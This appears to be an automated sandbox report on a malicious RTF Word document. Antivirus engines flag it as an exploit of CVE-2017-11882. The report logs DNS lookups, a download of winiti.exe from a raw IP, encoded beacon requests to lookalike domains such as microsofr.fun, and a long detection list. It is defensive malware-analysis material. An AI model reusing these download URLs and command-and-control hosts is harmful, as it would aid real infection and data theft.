Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | July 26, 2024, 11:56 a.m. | July 26, 2024, 12:07 p.m. |
-
WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" C:\Users\test22\AppData\Local\Temp\simplethingstobefranksheisverybeautifulgirlevenwhichicaansethegirltogetbacktohegreattingsforme__________sheisverybeautyhotgirlsever.doc
2652
Name | Response | Post-Analysis Lookup |
---|---|---|
www.microsofr.fun |
CNAME
microsofr.fun
|
13.248.213.45 |
www.ninunveiled.shop | 172.67.170.124 | |
www.c7v88.top |
CNAME
c7v88.top
|
15.197.148.33 |
www.askvanta.com |
CNAME
askvanta.com
|
3.33.130.190 |
www.juliakoppel.org | 109.172.114.38 | |
www.eworld.org | 13.248.169.48 | |
www.sqlite.org | 45.33.6.223 | |
www.gotvoom.pro |
CNAME
gotvoom.pro
|
15.197.148.33 |
Suricata Alerts
Suricata TLS
No Suricata TLS
suspicious_features | Connection to IP address | suspicious_request | GET http://104.219.239.104/54/winiti.exe |
request | GET http://104.219.239.104/54/winiti.exe |
request | POST http://www.c7v88.top/v6ba/ |
request | GET http://www.c7v88.top/v6ba/?siFuhe3N=nJtV0xxVonYleLmyEDIGF1GRtIwzCkYblW7ymF81wwUwIwWLid3Lr9yJw2X9YaLdXd5m2mo1Ok9Zsjhn2cbjbjbKzyMWkQ/uC8atz3xgP0khh14CmXxCw976WGM8OA3qn6b9QMQ=&Qt3=HJYf |
request | GET http://www.sqlite.org/2021/sqlite-dll-win32-x86-3350000.zip |
request | POST http://www.gotvoom.pro/yagd/ |
request | GET http://www.gotvoom.pro/yagd/?siFuhe3N=uEwhQtN8d9WFSPX3vcuayxdpQqb8c/D/UpaKbFjD70Hg2gjUyZfmxqkinXZDMhG9GrAjDWM/1uaY6+kvF7tL6dHrL5YWOt4Y3qm+cyYTZ0PahKZdxCx3NJ3PVHCt9uZUePj8NnU=&Qt3=HJYf |
request | POST http://www.juliakoppel.org/9wjj/ |
request | GET http://www.juliakoppel.org/9wjj/?siFuhe3N=3pAkfJORuRgA59m5D3Ccm/a2baSHIB7ZSYQ2sF+aO2KWoeTfZIMk0oynOCre8P7un/vWh9+jgjqgzzA3WVgVD2gacPCD8hv2BH56l/1+ZEKULaKcv9mw30410B/1ELsaBxrqqsU=&Qt3=HJYf |
request | POST http://www.askvanta.com/hhti/ |
request | GET http://www.askvanta.com/hhti/?siFuhe3N=fjRDIvTmNEJNTuTcr8del2WQp76nRU4WKVyXC6Y4v5xhqnRixQ6zeb282ydBwPMN2XVyKj7Iv4bMnoolEkDYP7t2qkRY0AApd+m94wn/hzh5njk5AnE5TcuZf+A5lnJQAByr72U=&Qt3=HJYf |
request | POST http://www.microsofr.fun/omnp/ |
request | GET http://www.microsofr.fun/omnp/?siFuhe3N=GQSd+8pi26b7zJhOJIQXVD/h3K/inFV8tNrqSt2nhXuDaWJRns1If/+gRxLu2YDerAFibGs6WR2Qt7jgVufvyJTnycUzu8Yso7GmTERVlWVgi3ROCwKMdFc5FOB0p/g90EsMQlA=&Qt3=HJYf |
request | POST http://www.eworld.org/18e1/ |
request | GET http://www.eworld.org/18e1/?siFuhe3N=Pm7pKTMIYdCMccpB3xsAXFwsVOfU5MHbomtkvn/TIB3o6VHyHDbhzBEtFW9t5aJY+pX07Evew+XtfHVHXf6tslmSqwg1OujBiiUxK9iHVQ3RBf96wgYN9V5GQcLy17oB+M1M8tY=&Qt3=HJYf |
request | POST http://www.ninunveiled.shop/y2xs/ |
request | POST http://www.c7v88.top/v6ba/ |
request | POST http://www.gotvoom.pro/yagd/ |
request | POST http://www.juliakoppel.org/9wjj/ |
request | POST http://www.askvanta.com/hhti/ |
request | POST http://www.microsofr.fun/omnp/ |
request | POST http://www.eworld.org/18e1/ |
request | POST http://www.ninunveiled.shop/y2xs/ |
file | C:\Users\test22\AppData\Local\Temp\~$mplethingstobefranksheisverybeautifulgirlevenwhichicaansethegirltogetbacktohegreattingsforme__________sheisverybeautyhotgirlsever.doc |
filetype_details | Rich Text Format data, version 1, unknown character set | filename | simplethingstobefranksheisverybeautifulgirlevenwhichicaansethegirltogetbacktohegreattingsforme__________sheisverybeautyhotgirlsever.doc |
host | 104.219.239.104 |
Lionic | Trojan.MSOffice.ObfsObjDat.4!c |
Cynet | Malicious (score: 99) |
CAT-QuickHeal | Exp.RTF.Obfus.Gen |
ALYac | Exploit.RTF-ObfsObjDat.Gen |
VIPRE | Exploit.RTF-ObfsObjDat.Gen |
Sangfor | Malware.Generic-RTF.Save.9548b23d |
VirIT | Trojan.RTF.Heur.A |
Symantec | Exp.CVE-2017-11882!g2 |
ESET-NOD32 | multiple detections |
Avast | RTF:Obfuscated-gen [Trj] |
BitDefender | Exploit.RTF-ObfsObjDat.Gen |
NANO-Antivirus | Exploit.Rtf.Heuristic-rtf.dinbqn |
MicroWorld-eScan | Exploit.RTF-ObfsObjDat.Gen |
Rising | Exploit.Generic!1.EB5C (CLASSIC) |
Emsisoft | Exploit.RTF-ObfsObjDat.Gen (B) |
F-Secure | Trojan.TR/AVI.Obfuscated.hgwjl |
DrWeb | Exploit.CVE-2017-11882.123 |
TrendMicro | HEUR_RTFMALFORM |
FireEye | Exploit.RTF-ObfsObjDat.Gen |
Sophos | Troj/RtfExp-EQ |
Ikarus | Exploit.CVE-2017-11882 |
Detected | |
Avira | TR/AVI.Obfuscated.hgwjl |
MAX | malware (ai score=88) |
Antiy-AVL | Trojan[Exploit]/MSOffice.CVE-2017-11882 |
Kingsoft | Win32.Infected.AutoInfector.a |
Arcabit | Exploit.RTF-ObfsObjDat.Gen |
ZoneAlarm | HEUR:Exploit.MSOffice.Generic |
Varist | CVE-2017-11882.E.gen!Camelot |
AhnLab-V3 | RTF/Malform-A.Gen |
Zoner | Probably Heur.RTFObfuscation |
Tencent | Office.Exploit.Generic.Vgil |
huorong | Exploit/CVE-2017-11882.gen |
Fortinet | MSOffice/CVE_2017_11882.DMP!exploit |
AVG | RTF:Obfuscated-gen [Trj] |